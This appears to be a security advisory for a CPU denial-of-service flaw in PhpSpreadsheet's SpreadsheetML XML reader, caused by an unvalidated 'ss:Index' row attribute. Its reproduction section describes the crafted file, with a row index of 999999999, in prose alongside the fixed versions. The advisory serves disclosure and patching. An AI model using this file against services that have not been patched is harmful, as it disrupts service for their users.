PhpSpreadsheet SpreadsheetML XML Reader Unvalidated Row Index Vulnerability Leading to CPU Denial-of-Service

A denial-of-service vulnerability has been identified in PhpSpreadsheet versions prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0. The issue arises in the SpreadsheetML XML reader, specifically in the 'Reader\Xml' component, where the 'ss:Index' row attribute is not validated against the maximum allowed row count of 1,048,576. This oversight allows an attacker to craft a SpreadsheetML file with an exaggerated row index, which significantly inflates the internal row cache. Subsequent iterations over the row data can cause severe CPU exhaustion, leading to a denial-of-service condition.

Impact

Exploitation of this vulnerability causes CPU exhaustion by forcing the application to iterate over an inflated number of rows, approximately 1 billion, based on the crafted 'ss:Index' value. This process blocks the PHP worker, potentially disrupting service for all concurrent users, and can trigger PHP's maximum execution time limits, causing additional resource consumption before the process is terminated.

Reproduction

To reproduce this vulnerability, create a SpreadsheetML file named 'poc.xml' with a row element that includes an 'ss:Index' attribute set to '999999999'. Load this file using the PhpSpreadsheet library's XML reader. After the file is processed, the active sheet's highest row value will reflect the inflated index, approximately 1 billion. Iterating over the row iterator will result in a CPU exhaustion attack, as the loop will never complete due to the excessive number of rows.

Remediation

Users should update to PhpSpreadsheet versions 1.30.4, 2.1.16, 2.4.5, 3.10.5, or 5.7.0, where this vulnerability has been fixed.